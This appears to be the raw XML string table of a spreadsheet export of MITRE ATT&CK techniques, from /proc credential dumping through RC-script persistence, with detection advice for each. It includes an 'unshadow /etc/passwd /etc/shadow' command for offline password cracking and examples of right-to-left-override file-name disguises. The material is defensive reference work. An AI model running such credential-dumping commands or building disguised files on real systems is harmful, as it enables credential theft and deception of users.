    <t>Adversaries may gather credentials from information stored in the Proc filesystem or &lt;code&gt;/proc&lt;/code&gt;. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/007</t>
  </si>
  <si>
    <t>19 March 2020</t>
  </si>
  <si>
    <t>To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/\*/maps&lt;/code&gt;, where the &lt;code&gt;\*&lt;/code&gt;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</si>
  <si>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Linux</t>
  </si>
  <si>
    <t>OS Credential Dumping: /etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to dump the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to enable offline password cracking. Most modern Linux operating systems use a combination of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to store user account information including password hashes in &lt;code&gt;/etc/shadow&lt;/code&gt;. By default, &lt;code&gt;/etc/shadow&lt;/code&gt; is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) &lt;code&gt;# /usr/bin/unshadow /etc/passwd /etc/shadow &gt; /tmp/crack.password.db&lt;/code&gt;
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/008</t>
  </si>
  <si>
    <t>20 March 2020</t>
  </si>
  <si>
    <t>The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1005</t>
  </si>
  <si>
    <t>1.3</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system.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</si>
  <si>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William Cain</t>
  </si>
  <si>
    <t>Privileges to access certain files and directories</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</si>
  <si>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bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1006</t>
  </si>
  <si>
    <t>09 February 2021</t>
  </si>
  <si>
    <t>2.0</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)
Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.</t>
  </si>
  <si>
    <t>File monitoring, File system access controls</t>
  </si>
  <si>
    <t>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1007</t>
  </si>
  <si>
    <t>17 October 2021</t>
  </si>
  <si>
    <t>1.2</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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Windows, macOS</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1008</t>
  </si>
  <si>
    <t>14 July 2020</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1010</t>
  </si>
  <si>
    <t>26 March 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1011</t>
  </si>
  <si>
    <t>28 March 2020</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.</t>
  </si>
  <si>
    <t>Itzik Kotler, SafeBreach</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel.
Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1011/001</t>
  </si>
  <si>
    <t>09 March 2020</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1012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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1014</t>
  </si>
  <si>
    <t>20 June 2020</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</si>
  <si>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</si>
  <si>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Anti-virus, Application control, Application control by file name or path, File monitoring, Host intrusion prevention systems, Signature-based detection, System access controls</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</si>
  <si>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use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1016</t>
  </si>
  <si>
    <t>08 October 2021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</si>
  <si>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</si>
  <si>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Network Configuration Discovery: Internet Connection Discovery</t>
  </si>
  <si>
    <t>Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), &lt;code&gt;tracert&lt;/code&gt;, and GET requests to websites.
Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1016/001</t>
  </si>
  <si>
    <t>17 March 2021</t>
  </si>
  <si>
    <t>25 March 2021</t>
  </si>
  <si>
    <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
Monitor processes and command-line arguments for actions that could be taken to check Internet connectivity.</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</si>
  <si>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use local host files (ex: &lt;code&gt;C:\Windows\System32\Drivers\etc\hosts&lt;/code&gt; or &lt;code&gt;/etc/hosts&lt;/code&gt;) in order to discover the hostname to IP address mappings of remote systems. 
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1018</t>
  </si>
  <si>
    <t>3.2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</si>
  <si>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</si>
  <si>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Daniel Stepanic, Elastic; RedHuntLabs, @redhuntlabs</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.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</si>
  <si>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https://attack.mitre.org/techniques/T1020</t>
  </si>
  <si>
    <t>16 August 2021</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</t>
  </si>
  <si>
    <t>Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>ExtraHop</t>
  </si>
  <si>
    <t>Automated Exfiltration: Traffic Duplication</t>
  </si>
  <si>
    <t>Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure.  Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)
Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1020/001</t>
  </si>
  <si>
    <t>19 October 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals).  Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. </t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept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</si>
  <si>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https://attack.mitre.org/techniques/T1021</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>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Use of applications such as ARD may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using these applications. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. 
In macOS, you can review logs for "screensharingd" and "Authentication" event messages. Monitor network connections regarding remote management (ports tcp:3283 and tcp:5900) and for remote login (port tcp:22).(Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)</t>
  </si>
  <si>
    <t>Dan Borges, @1njection</t>
  </si>
  <si>
    <t>Active remote service accepting connections and valid credentials</t>
  </si>
  <si>
    <t>Remote Services: Remote Desktop Protocol</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.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connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/001</t>
  </si>
  <si>
    <t>25 February 2020</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</si>
  <si>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</si>
  <si>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Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>RDP service enabled, account in the Remote Desktop Users group</t>
  </si>
  <si>
    <t>Remote Services: SMB/Windows Admin Shares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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/002</t>
  </si>
  <si>
    <t>23 March 2020</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</si>
  <si>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</si>
  <si>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SMB enabled; Host/network firewalls not blocking SMB ports between source and destination; Use of domain account in administrator group on remote system or default system admin account.</t>
  </si>
  <si>
    <t>Remote Services: Distributed Component Object Model</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/003</t>
  </si>
  <si>
    <t>23 June 2021</t>
  </si>
  <si>
    <t>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Monitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).</t>
  </si>
  <si>
    <t>Remote Services: SSH</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.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user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/004</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</si>
  <si>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</si>
  <si>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Linux, macOS</t>
  </si>
  <si>
    <t>An SSH server is configured and running.</t>
  </si>
  <si>
    <t>Remote Services: VNC</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)
Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/005</t>
  </si>
  <si>
    <t>07 October 2021</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</si>
  <si>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</si>
  <si>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VNC server installed and listening for connections.</t>
  </si>
  <si>
    <t>Remote Services: Windows Remote Management</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM  can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/006</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</si>
  <si>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</si>
  <si>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Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1025</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</si>
  <si>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</si>
  <si>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Privileges to access removable media drive and files</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</si>
  <si>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used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obfuscate commands executed from payloads or directly via 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</si>
  <si>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https://attack.mitre.org/techniques/T1027</t>
  </si>
  <si>
    <t>20 October 2021</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</si>
  <si>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</si>
  <si>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Christiaan Beek, @ChristiaanBeek; Red Canary</t>
  </si>
  <si>
    <t>Application control, Application control by file name or path, Host forensic analysis, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Binary Padding</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/001</t>
  </si>
  <si>
    <t>05 February 2020</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</si>
  <si>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</si>
  <si>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Martin Jirkal, ESET</t>
  </si>
  <si>
    <t>Anti-virus, Signature-based detection</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Software Packing</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) 
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/002</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</t>
  </si>
  <si>
    <t>Filip Kafka, ESET</t>
  </si>
  <si>
    <t>Anti-virus, Heuristic detection, Signature-based detection</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Steganography</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/003</t>
  </si>
  <si>
    <t>Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Compile After Delivery</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/004</t>
  </si>
  <si>
    <t>16 March 2020</t>
  </si>
  <si>
    <t>29 March 2020</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</si>
  <si>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</si>
  <si>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Praetorian; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>Compiler software (either native to the system or delivered by the adversary)</t>
  </si>
  <si>
    <t>Anti-virus, Binary Analysis, Host intrusion prevention systems, Signature-based detection, Static File Analysis</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/005</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</si>
  <si>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</si>
  <si>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Anti-virus, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: HTML Smuggling</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/006</t>
  </si>
  <si>
    <t>20 May 2021</t>
  </si>
  <si>
    <t>18 October 2021</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</si>
  <si>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</si>
  <si>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Jonathan Boucher, @crash_wave, Bank of Canada; Stan Hegt, Outflank</t>
  </si>
  <si>
    <t>Anti-virus, Static file analysis, Web content filters</t>
  </si>
  <si>
    <t>Adversaries may schedule data exfiltration to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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1029</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</si>
  <si>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</si>
  <si>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An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1030</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1033</t>
  </si>
  <si>
    <t>12 August 2021</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036</t>
  </si>
  <si>
    <t>1.4</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</si>
  <si>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</si>
  <si>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Containers, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Bartosz Jerzman; David Lu, Tripwire; Elastic; Felipe Espósito, @Pr0teus; Nick Carr, Mandiant; Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>Application control by file name or path</t>
  </si>
  <si>
    <t>Masquerading: Invalid Code Signature</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/001</t>
  </si>
  <si>
    <t>10 February 2020</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>Masquerading: Right-to-Left Override</t>
  </si>
  <si>
    <t>Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named &lt;code&gt;March 25 \u202Excod.scr&lt;/code&gt; will display as &lt;code&gt;March 25 rcs.docx&lt;/code&gt;. A JavaScript file named &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; will be displayed as &lt;code&gt;photo_high_resj.png&lt;/code&gt;.(Citation: Infosecinstitute RTLO Technique)
Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/002</t>
  </si>
  <si>
    <t>14 October 2021</t>
  </si>
  <si>
    <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</si>
  <si>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Masquerading: Rename System Utilities</t>
  </si>
  <si>
    <t>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename &lt;code&gt;rundll32.exe&lt;/code&gt;). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/003</t>
  </si>
  <si>
    <t>23 November 2020</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</si>
  <si>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</si>
  <si>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Masquerading: Masquerade Task or Service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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/004</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</si>
  <si>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</si>
  <si>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Masquerading: Match Legitimate Name or Location</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/005</t>
  </si>
  <si>
    <t>20 April 2021</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</si>
  <si>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</si>
  <si>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Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Masquerading: Space after Filename</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/006</t>
  </si>
  <si>
    <t>It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.</t>
  </si>
  <si>
    <t>Erye Hernandez, Palo Alto Networks</t>
  </si>
  <si>
    <t>Masquerading: Double File Extension</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/007</t>
  </si>
  <si>
    <t>04 August 2021</t>
  </si>
  <si>
    <t>Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)</t>
  </si>
  <si>
    <t>Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.  
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. 
An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037</t>
  </si>
  <si>
    <t>27 April 2021</t>
  </si>
  <si>
    <t>Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Logon Script (Windows)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; Registry key.(Citation: Hexacorn Logon Scripts)
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/001</t>
  </si>
  <si>
    <t>10 January 2020</t>
  </si>
  <si>
    <t>Monitor for changes to Registry values associated with Windows logon scrips, nameley &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Logon Script (Mac)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook)
Adversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/002</t>
  </si>
  <si>
    <t>27 March 2020</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Network Logon Script</t>
  </si>
  <si>
    <t>Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.  
Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/003</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: RC Scripts</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
Adversaries can establish persistence by adding a malicious binary path or shell commands to &lt;code&gt;rc.local&lt;/code&gt;, &lt;code&gt;rc.common&lt;/code&gt;, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/004</t>
  </si>
  <si>
    <t>15 January 2020</t>
  </si>
  <si>
